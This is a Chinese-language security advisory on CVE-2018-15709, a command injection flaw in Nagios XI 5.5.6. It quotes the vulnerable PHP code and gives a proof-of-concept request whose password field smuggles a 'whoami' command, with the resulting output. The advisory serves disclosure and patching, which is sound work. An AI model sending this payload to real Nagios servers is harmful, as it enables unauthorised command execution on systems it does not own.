安全研究

安全漏洞
Nagios Cmdsubsys.php命令注入漏洞(CVE-2018-15709)

发布日期:2018-12-07
更新日期:2018-12-11

受影响系统:
Nagios XI 5.5.6
描述:
CVE(CAN) ID: CVE-2018-15709

Nagios XI是一套IT基础设施监控解决方案。

Nagios XI 5.5.6版本,在Cmdsubsys.php实现中存在命令注入安全漏洞。远程攻击者可通过发送特制的HTTP请求,利用该漏洞注入并执行任意OS命令。

<*来源:vendor
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

vendor ()提供了如下测试方法:

case COMMAND_NAGIOSXI_SET_HTACCESS:
    $cmdarr = unserialize($command_data);    
    $cmdline = $cfg['htpasswd_path']." -b -s ".$cfg['htaccess_file']." ".$cmdarr["username"]." '".$cmdarr["password"]."'";
    break;
...
$output = system($cmdline, $return_code);

https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312

$ cat /usr/local/nagiosxi/tmp/whoami.txt
nagios

建议:
厂商补丁:

Nagios
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.nagios.org/

参考:https://www.tenable.com/security/research/tra-2018-37

浏览次数:2410
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障